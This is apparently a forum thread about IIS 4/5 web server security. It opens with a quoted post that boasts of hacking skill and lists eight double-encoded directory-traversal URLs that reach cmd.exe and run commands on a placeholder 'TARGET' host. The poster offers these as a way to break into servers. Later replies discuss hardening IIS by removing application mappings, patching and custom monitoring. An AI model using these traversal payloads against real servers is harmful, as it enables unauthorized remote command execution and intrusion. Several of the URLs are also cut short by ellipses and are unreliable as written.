Originally posted here by Truti
Hey Dude!

I whoud never run a IIS 4,5 server if i where you!
I'm spacialist i bug finding in IIS 4, 5 and it's not small bugs there are.... Plenty of big Remote Bugs!

try:

****************************************************************************************************************

http://www.TARGET.dk/scripts/..%255c...exe?/c+dir+c:\


http://www.TARGET.dk/msadc/..%255c.....exe?/c+dir+c:\

http://www.TARGET.dk/cgi-bin/..%255c...exe?/c+dir+c:\

http://www.TARGET.dk/samples/..%255c...exe?/c+dir+c:\

http://www.TARGET.dk/iisadmpwd/..%25...exe?/c+dir+c:\

http://www.TARGET.dk/_vti_cnf/..%255...system32/cmd.e
xe?/c+dir+c:\

http://www.TARGET.dk/_vti_bin/..%255...system32/cmd.e
xe?/c+dir+c:\

http://www.TARGET.dk/adsamples/..%25...system32/cmd.e
xe?/c+dir+c:\

****************************************************************************************************************

Then you will get a DIR over the target server.... But this is on a fresh install but there are 1000 of bugs in this shitty IIS servers..... I run Apache and it's what i will say the most stabil server i ever have discoverd! I have only positive words for Apache!

Give me 5 min and i will have a ROOT ascount on you'r IIS server!
Assuming that apache runs all these application mappings correct?
I've been using it (IIS) for years now and never had any problems with hacks, nimda, or the like. The first thing I did back in March of 2000 when IIS 5 came out with Win2k was remove ALL application mappings, virtual directories and like.
Sure I keep up with patches, but the exploits I find always target mappings I don't use. So I'm not too worried. I also write my own programs to monitor my server for suspisous activity and have had fun sending hackers to my http blackhole many times
I too, stay away from MS remote tools, I create my own, works much better
You can really get ROOT of IIS in under 5 minutes? If I e-mail you my server address would you feel free to root it for me, I will at least have piece of mind because rooting my own machine just doesn't satisfy me about the security setup I have.